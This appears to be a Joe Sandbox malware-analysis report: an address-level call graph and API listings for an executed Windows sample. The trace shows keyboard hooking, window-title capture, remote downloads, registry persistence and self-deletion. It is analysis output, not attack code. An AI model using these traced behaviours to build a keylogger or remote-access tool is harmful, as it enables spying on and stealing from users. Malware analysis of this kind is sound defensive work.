48915->48919 48916 406dd8 28 API calls 48916->48919 48917 401fd8 11 API calls 48917->48919 48919->48907 48919->48910 48919->48912 48919->48914 48919->48915 48919->48916 48919->48917 48920 401fd8 11 API calls 48919->48920 48944 41c485 32 API calls 48919->48944 48945 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 48919->48945 48920->48909 48922 40a722 48921->48922 48924 40a68b 48921->48924 48922->48909 48923 40a6aa CreateFileW 48923->48924 48925 40a6b8 GetFileSize 48923->48925 48924->48923 48926 40a6ed FindCloseChangeNotification 48924->48926 48927 40a6ff 48924->48927 48928 40a6e2 Sleep 48924->48928 48929 40a6db 48924->48929 48925->48924 48925->48926 48926->48924 48927->48922 48931 40905c 28 API calls 48927->48931 48928->48926 48946 40b0dc 84 API calls 48929->48946 48932 40a71b 48931->48932 48933 40a179 125 API calls 48932->48933 48933->48922 48935 41c404 CreateFileW 48934->48935 48937 41c441 48935->48937 48938 41c43d 48935->48938 48939 41c461 WriteFile 48937->48939 48940 41c448 SetFilePointer 48937->48940 48938->48909 48942 41c474 48939->48942 48943 41c476 FindCloseChangeNotification 48939->48943 48940->48939 48941 41c458 CloseHandle 48940->48941 48941->48938 48942->48943 48943->48938 48944->48919 48945->48919 48946->48928 48948 40a2d1 GetModuleHandleA SetWindowsHookExA 48947->48948 48949 40a333 GetMessageA 48947->48949 48948->48949 48951 40a2ed GetLastError 48948->48951 48950 40a345 TranslateMessage DispatchMessageA 48949->48950 48961 40a270 48949->48961 48950->48949 48950->48961 48952 41bb8e 28 API calls 48951->48952 48953 40a2fe 48952->48953 48962 4052fd 28 API calls 48953->48962 48965 40ace4 48963->48965 48964 40a292 48965->48964 48966 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48965->48966 48969 401f86 11 API calls 48965->48969 48972 41bae6 GetLastInputInfo GetTickCount 48965->48972 48973 40ad84 GetWindowTextW 48965->48973 48975 40aedc 48965->48975 48976 40b8ec 28 API calls 48965->48976 48978 40ae49 Sleep 48965->48978 48979 441e81 20 API calls 48965->48979 48981 402093 28 API calls 48965->48981 48982 40add1 48965->48982 48987 403014 28 API calls 48965->48987 48988 406383 28 API calls 48965->48988 48989 41bc5e 28 API calls 48965->48989 48990 40a636 12 API calls 48965->48990 48991 401f09 11 API calls 48965->48991 48992 401fd8 11 API calls 48965->48992 48993 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48965->48993 48994 434770 23 API calls __onexit 48965->48994 48995 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48965->48995 48996 409044 28 API calls 48965->48996 48998 40b97c 28 API calls 48965->48998 48999 40b748 40 API calls 2 library calls 48965->48999 49000 4052fd 28 API calls 48965->49000 48968 40b904 28 API calls 48966->48968 48968->48965 48969->48965 48972->48965 48973->48965 48977 401f09 11 API calls 48975->48977 48976->48965 48977->48964 48978->48965 48979->48965 48981->48965 48982->48965 48985 40905c 28 API calls 48982->48985 48997 40b164 31 API calls new 48982->48997 48985->48982 48987->48965 48988->48965 48989->48965 48990->48965 48991->48965 48992->48965 48994->48965 48995->48965 48996->48965 48997->48982 48998->48965 48999->48965 49007 404353 49002->49007 49004 40430a 49005 403262 11 API calls 49004->49005 49006 404319 49005->49006 49006->48607 49008 40435f 49007->49008 49011 404371 49008->49011 49010 40436d 49010->49004 49012 40437f 49011->49012 49013 404385 49012->49013 49014 40439e 49012->49014 49075 4034e6 28 API calls 49013->49075 49015 402888 22 API calls 49014->49015 49016 4043a6 49015->49016 49018 404419 49016->49018 49019 4043bf 49016->49019 49076 4028a4 22 API calls 49018->49076 49021 4027e6 28 API calls 49019->49021 49030 40439c 49019->49030 49021->49030 49030->49010 49075->49030 49083 43aa9a 49077->49083 49081 4138b9 49080->49081 49082 41388f RegSetValueExA RegCloseKey 49080->49082 49081->48626 49082->49081 49086 43aa1b 49083->49086 49085 40170d 49085->48624 49087 43aa2a 49086->49087 49088 43aa3e 49086->49088 49092 4405dd 20 API calls _abort 49087->49092 49091 43aa2f __alldvrm __cftof 49088->49091 49093 448957 11 API calls 2 library calls 49088->49093 49091->49085 49092->49091 49093->49091 49095 41b8f9 ctype ___scrt_get_show_window_mode 49094->49095 49096 402093 28 API calls 49095->49096 49097 414f49 49096->49097 49097->48632 49098->48649 49100 414f02 getaddrinfo WSASetLastError 49099->49100 49101 414ef8 49099->49101 49100->48708 49127 414d86 29 API calls ___std_exception_copy 49101->49127 49103 414efd 49103->49100 49128 41b7b6 GlobalMemoryStatusEx 49104->49128 49106 41b7f5 49106->48708 49129 414580 49107->49129 49111 40dda5 49110->49111 49112 4134ff 3 API calls 49111->49112 49114 40ddac 49112->49114 49113 40ddc4 49113->48708 49114->49113 49115 413549 3 API calls 49114->49115 49115->49113 49117 4020b7 28 API calls 49116->49117 49118 41bc57 49117->49118 49118->48708 49119->48708 49121 402093 28 API calls 49120->49121 49122 40f8f6 49121->49122 49122->48708 49123->48708 49124->48708 49126->48708 49127->49103 49128->49106 49132 414553 49129->49132 49133 414568 ___scrt_initialize_default_local_stdio_options 49132->49133 49136 43f79d 49133->49136 49139 43c4f0 49136->49139 49140 43c530 49139->49140 49141 43c518 49139->49141 49140->49141 49143 43c538 49140->49143 49161 4405dd 20 API calls _abort 49141->49161 49162 43a7b7 36 API calls 2 library calls 49143->49162 49144 43c51d __cftof 49154 434fcb 49144->49154 49146 43c548 49163 43cc76 20 API calls 2 library calls 49146->49163 49149 414576 49149->48708 49150 43c5c0 49164 43d2e4 51 API calls 3 library calls 49150->49164 49153 43c5cb 49165 43cce0 20 API calls _free 49153->49165 49155 434fd6 IsProcessorFeaturePresent 49154->49155 49156 434fd4 49154->49156 49158 435018 49155->49158 49156->49149 49166 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 49158->49166 49160 4350fb 49160->49149 49161->49144 49162->49146 49163->49150 49164->49153 49165->49144 49166->49160 49168->48740 49169->48767 49170->48766 49171->48755 49172->48759 49173->48765 49174->48798 49181 40f7c2 49177->49181 49178 413549 3 API calls 49178->49181 49179 40f866 49183 40905c 28 API calls 49179->49183 49180 40905c 28 API calls 49190 40f7f9 49180->49190 49181->49178 49181->49179 49182 40f856 Sleep 49181->49182 49181->49190 49210 40d096 49181->49210 49182->49181 49184 40f871 49183->49184 49187 41bc5e 28 API calls 49184->49187 49186 41bc5e 28 API calls 49186->49190 49188 40f87d 49187->49188 49298 413814 14 API calls 49188->49298 49190->49180 49190->49182 49190->49186 49192 401f09 11 API calls 49190->49192 49195 402093 28 API calls 49190->49195 49199 41376f 14 API calls 49190->49199 49297 413814 14 API calls 49190->49297 49192->49190 49193 40f890 49194 401f09 11 API calls 49193->49194 49196 40f89c 49194->49196 49195->49190 49197 402093 28 API calls 49196->49197 49198 40f8ad 49197->49198 49200 41376f 14 API calls 49198->49200 49199->49190 49201 40f8c0 49200->49201 49299 412850 TerminateProcess WaitForSingleObject 49201->49299 49203 40f8c8 ExitProcess 49374 4127ee 62 API calls 49208->49374 49300 412850 TerminateProcess WaitForSingleObject 49210->49300 49212 40d0a5 49213 40d0b8 49212->49213 49301 40b8ac TerminateThread 49212->49301 49215 40d0c8 49213->49215 49325 419a94 9 API calls 49213->49325 49217 40d0d1 49215->49217 49218 40d0e2 49215->49218 49326 41c291 9 API calls 49217->49326 49220 413a23 2 API calls 49218->49220 49221 40d108 49218->49221 49220->49221 49222 413a23 2 API calls 49221->49222 49223 40d127 49221->49223 49222->49223 49224 413a23 2 API calls 49223->49224 49225 40d144 ___scrt_get_show_window_mode 49223->49225 49224->49225 49226 4136f8 3 API calls 49225->49226 49227 40d194 49226->49227 49228 40d1ab 49227->49228 49229 40d19b GetModuleFileNameW 49227->49229 49230 40d1b2 RegDeleteKeyA 49228->49230 49229->49228 49231 40d1d1 49230->49231 49232 40d1ea SetFileAttributesW 49231->49232 49233 40d1db 49231->49233 49308 41b978 49232->49308 49235 40d1e7 SetFileAttributesW 49233->49235 49235->49232 49237 41bc5e 28 API calls 49238 40d218 49237->49238 49239 403014 28 API calls 49238->49239 49240 40d226 49239->49240 49241 401f09 11 API calls 49240->49241 49242 40d230 49241->49242 49243 401fd8 11 API calls 49242->49243 49244 40d239 49243->49244 49245 40417e 28 API calls 49244->49245 49246 40d25b 49245->49246 49247 403014 28 API calls 49246->49247 49248 40d266 49247->49248 49320 40431d 49248->49320 49251 401f09 11 API calls 49252 40d27c 49251->49252 49253 401f09 11 API calls 49252->49253 49254 40d285 49253->49254 49255 40417e 28 API calls 49254->49255 49256 40d293 49255->49256 49257 4042fc 79 API calls 49256->49257 49258 40d2a2 49257->49258 49259 401f09 11 API calls 49258->49259 49260 40d2ac 49259->49260 49261 40d308 49260->49261 49262 40417e 28 API calls 49260->49262 49263 40417e 28 API calls 49261->49263 49265 40d2c7 49262->49265 49264 40d323 49263->49264 49266 403014 28 API calls 49264->49266 49267 4042fc 79 API calls 49265->49267 49268 40d32e 49266->49268 49269 40d2d6 49267->49269 49270 403014 28 API calls 49268->49270 49271 403014 28 API calls 49269->49271 49272 40d33a 49270->49272 49273 40d2e2 49271->49273 49274 401f09 11 API calls 49272->49274 49275 401f09 11 API calls 49273->49275 49276 40d34e 49274->49276 49277 40d2f6 49275->49277 49278 401f09 11 API calls 49276->49278 49279 401f09 11 API calls 49277->49279 49280 40d357 49278->49280 49281 40d2ff 49279->49281 49282 401f09 11 API calls 49280->49282 49283 401f09 11 API calls 49281->49283 49284 40d360 49282->49284 49283->49261 49289 40d3c1 49284->49289 49327 40b97c 28 API calls 49284->49327 49286 40d398 49287 403014 28 API calls 49286->49287 49288 40d3a4 49287->49288 49290 401f09 11 API calls 49288->49290 49292 41c3f1 5 API calls 49289->49292 49291 40d3b8 49290->49291 49293 401f09 11 API calls 49291->49293 49294 40d3f9 49292->49294 49293->49289 49295 40d418 ExitProcess 49294->49295 49296 40d40b ShellExecuteW 49294->49296 49296->49295 49297->49190 49298->49193 49299->49203 49300->49212 49302 40b8c5 UnhookWindowsHookEx TerminateThread 49301->49302 49303 40b869 49301->49303 49302->49303 49304 40b875 DeleteFileW 49303->49304 49306 40b891 49304->49306 49305 40b8a7 49305->49213 49306->49305 49307 40b8a0 RemoveDirectoryW 49306->49307 49307->49305 49309 4020df 11 API calls 49308->49309 49310 41b988 49309->49310 49328 41b2ba 49310->49328 49316 40d20d 49316->49237 49317 441c4a 36 API calls 49318 41b9bf 49317->49318 49318->49316 49318->49317 49337 41cfd2 28 API calls 49318->49337 49371 40323f 49320->49371 49322 40432b 49323 403262 11 API calls 49322->49323 49324 40433a 49323->49324 49324->49251 49325->49215 49326->49218 49327->49286 49329 43aa9a 21 API calls 49328->49329 49330 41b2c1 GetCurrentProcessId 49329->49330 49331 441c6b 49330->49331 49338 448215 GetLastError 49331->49338 49333 41b9b3 49334 441c4a 49333->49334 49335 448215 __Getctype 36 API calls 49334->49335 49336 441c4f 49335->49336 49336->49318 49337->49318 49339 448237 49338->49339 49340 44822b 49338->49340 49360 445af3 20 API calls 3 library calls 49339->49360 49359 4487bc 11 API calls 2 library calls 49340->49359 49343 448231 49343->49339 49345 448280 SetLastError 49343->49345 49344 448243 49346 44824b 49344->49346 49367 448812 11 API calls 2 library calls 49344->49367 49345->49333 49361 446782 49346->49361 49348 448260 49348->49346 49350 448267 49348->49350 49368 448087 20 API calls __Getctype 49350->49368 49351 448251 49353 44828c SetLastError 49351->49353 49369 4460f4 36 API calls 4 library calls 49353->49369 49354 448272 49356 446782 _free 20 API calls 49354->49356 49358 448279 49356->49358 49357 448298 49358->49345 49358->49353 49359->49343 49360->49344 49362 44678d RtlFreeHeap 49361->49362 49366 4467b6 __dosmaperr 49361->49366 49363 4467a2 49362->49363 49362->49366 49370 4405dd 20 API calls _abort 49363->49370 49365 4467a8 GetLastError 49365->49366 49366->49351 49367->49348 49368->49354 49369->49357 49370->49365 49372 4036a6 28 API calls 49371->49372 49373 40324c 49372->49373 49373->49322 49375 415d06 49390 41b380 49375->49390 49377 415d0f 49378 4020f6 28 API calls 49377->49378 49379 415d1e 49378->49379 49380 404aa1 61 API calls 49379->49380 49381 415d2a 49380->49381 49382 417089 49381->49382 49383 401fd8 11 API calls 49381->49383 49384 401e8d 11 API calls 49382->49384 49383->49382 49385 417092 49384->49385 49386 401fd8 11 API calls 49385->49386 49387 41709e 49386->49387 49388 401fd8 11 API calls 49387->49388 49389 4170aa 49388->49389 49391 4020df 11 API calls 49390->49391 49392 41b38e 49391->49392 49393 43bd51 new 21 API calls 49392->49393 49394 41b39e InternetOpenW InternetOpenUrlW 49393->49394 49395 41b3c5 InternetReadFile 49394->49395 49399 41b3e8 49395->49399 49396 4020b7 28 API calls 49396->49399 49397 41b415 InternetCloseHandle InternetCloseHandle 49398 41b427 49397->49398 49398->49377 49399->49395 49399->49396 49399->49397 49400 401fd8 11 API calls 49399->49400 49400->49399 49401 416bab 49402 401e65 22 API calls 49401->49402 49403 416bb7 49402->49403 49404 416be3 49403->49404 49405 416bcc 49403->49405 49407 401e65 22 API calls 49404->49407 49406 401e65 22 API calls 49405->49406 49409 416bd1 49406->49409 49408 416be8 49407->49408 49410 4020f6 28 API calls 49408->49410 49411 4020f6 28 API calls 49409->49411 49412 416bdc 49410->49412 49411->49412 49421 4172cd 49412->49421 49415 401e8d 11 API calls 49416 417092 49415->49416 49417 401fd8 11 API calls 49416->49417 49418 41709e 49417->49418 49419 401fd8 11 API calls 49418->49419 49420 4170aa 49419->49420 49422 4172e3 49421->49422 49423 417485 49421->49423 49455 4046f7 49422->49455 49425 401fd8 11 API calls 49423->49425 49427 416bfd 49425->49427 49427->49415 49428 4048c8 97 API calls 49429 4172ff 49428->49429 49430 417477 49429->49430 49432 41bd1e 28 API calls 49429->49432 49465 404ee2 99 API calls 49430->49465 49433 417314 49432->49433 49434 402f31 28 API calls 49433->49434 49435 41732a 49434->49435 49436 402ea1 28 API calls 49435->49436 49437 417334 49436->49437 49438 404aa1 61 API calls 49437->49438 49439 417345 49438->49439 49440 401fd8 11 API calls 49439->49440 49441 41734d 49440->49441 49442 401fd8 11 API calls 49441->49442 49450 417355 49442->49450 49445 41ba96 30 API calls 49445->49450 49446 41bd1e 28 API calls 49446->49450 49447 4020b7 28 API calls 49447->49450 49448 402ea1 28 API calls 49448->49450 49449 404aa1 61 API calls 49449->49450 49450->49445 49450->49446 49450->49447 49450->49448 49450->49449 49451 401fd8 11 API calls 49450->49451 49452 401f09 11 API calls 49450->49452 49453 41746c 49450->49453 49462 41b77b GlobalMemoryStatusEx 49450->49462 49463 41b7ff GetSystemTimes Sleep GetSystemTimes 49450->49463 49451->49450 49452->49450 49454 404e26 99 API calls 49453->49454 49454->49430 49456 4020df 11 API calls 49455->49456 49457 404707 49456->49457 49458 4020df 11 API calls 49457->49458 49459 40471e 49458->49459 49460 404736 49459->49460 49461 40482d 3 API calls 49459->49461 49460->49428 49461->49460 49462->49450 49464 41b844 _swprintf __aulldiv 49463->49464 49464->49450 49466 43be58 49468 43be64 _swprintf ___scrt_is_nonwritable_in_current_image 49466->49468 49467 43be72 49482 4405dd 20 API calls _abort 49467->49482 49468->49467 49470 43be9c 49468->49470 49477 445888 EnterCriticalSection 49470->49477 49472 43be77 ___scrt_is_nonwritable_in_current_image __cftof 49473 43bea7 49478 43bf48 49473->49478 49477->49473 49480 43bf56 49478->49480 49479 43beb2 49483 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49479->49483 49480->49479 49484 44976c 37 API calls 2 library calls 49480->49484 49482->49472 49483->49472 49484->49480 49485 40165e 49486 401666 49485->49486 49489 401669 49485->49489 49487 4016a8 49488 4344ea new 22 API calls 49487->49488 49490 40169c 49488->49490 49489->49487 49491 401696 49489->49491 49492 4344ea new 22 API calls 49491->49492 49492->49490

                                Executed Functions

                                Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad$HandleModule
                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                • API String ID: 4236061018-3687161714
                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E9C5 Relevance: 88.3, APIs: 15, Strings: 35, Instructions: 795COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 80 40ec03-40ec0a call 40d069 70->80 81 40ebcb-40ebea call 401fab call 413549 70->81 90 40ec13-40ec1a 80->90 91 40ec0c-40ec0e 80->91 81->80 97 40ebec-40ec02 call 401fab call 4139a9 81->97 95 40ec1c 90->95 96 40ec1e-40ec2a call 41b2c3 90->96 94 40eef1 91->94 94->49 95->96 103 40ec33-40ec37 96->103 104 40ec2c-40ec2e 96->104 97->80 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->126 107 40ec76-40ec89 call 401e65 call 401fab 103->107 108 40ec39 call 407716 103->108 104->103 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->127 128 40ec8b call 407755 107->128 117 40ec3e-40ec40 108->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->107 140 40ec61-40ec67 121->140 157 40f3a5-40f3af call 40dd42 call 414f2a 126->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 140->107 144 40ec69-40ec6f 140->144 144->107 147 40ec71 call 407260 144->147 147->107 180 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->180 181 40ed8a-40ed91 177->181 178->177 205 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->205 236 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 180->236 184 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 181->184 185 40ee0f-40ee19 call 409057 181->185 191 40ee1e-40ee42 call 40247c call 434798 184->191 185->191 212 40ee51 191->212 213 40ee44-40ee4f call 436e90 191->213 205->177 218 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 212->218 213->218 273 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 218->273 287 40efc1 236->287 288 40efdc-40efde 236->288 273->236 286 40eece-40eeed call 401e65 call 41bc5e call 40f474 273->286 286->236 306 40eeef 286->306 292 40efc3-40efda call 41cd9b CreateThread 287->292 289 40efe0-40efe2 288->289 290 40efe4 288->290 289->292 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 290->294 292->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->94 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 357 40f159-40f16c call 401e65 call 401fab 347->357 358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 425 40f2e4-40f2e7 416->425 418->416 425->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 425->427 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                APIs
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
